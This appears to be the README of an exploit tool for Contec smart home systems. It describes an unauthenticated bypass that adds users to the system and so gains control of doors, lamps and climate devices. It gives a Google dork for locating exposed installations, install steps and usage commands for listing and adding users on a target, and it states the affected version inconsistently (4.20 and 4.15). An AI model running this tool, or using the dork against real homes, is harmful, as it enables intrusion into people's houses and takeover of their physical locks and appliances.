Developers assume no liability and are not responsible for any misuse or damage caused by this program
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user without confirming.
after Successfully added new users, the attacker can control anything (lamps, doors, air conditioner, etc)
Contec smart home Unauthorized Users Added
-
Affected version : 4.20 and older.
-
Google dork:
inurl:":9000" intitle:"Contec Intelligent Housing"
want to know more about Contec Smart Home system ?
- require 2 modules (bs4, requests)
Root@Linux: ~# pip install -r requirements.txt
or
Root@Linux: ~# pip install bs4 requests
- Work in both python 2.x and 3.x
- Tested on Windows Linux and MAC os
to view users list:
Root@Linux: ~# python ./contexploit.py -t http://<ip>:<port> --list-user
to added new user:
Root@Linux: ~# python ./contexploit.py -t http://<ip>:<port> -u <NewUser> -p <NewPassword>
help:
Root@Linux: ~# python contexploit.py --help
usage: python contexploit.py -t http://<ip>:<port> --list-user
Contec smart home Unauthorized Users Added. (Affected version : 4.15)
optional arguments:
-h, --help show this help message and exit
-v, --version Show version and exit
-t, --target Target address (e.g. http://<ip>:<port>)
-l, --list-user Grap all user list on the web server
-u, --new-user New username
-p, --new-password New password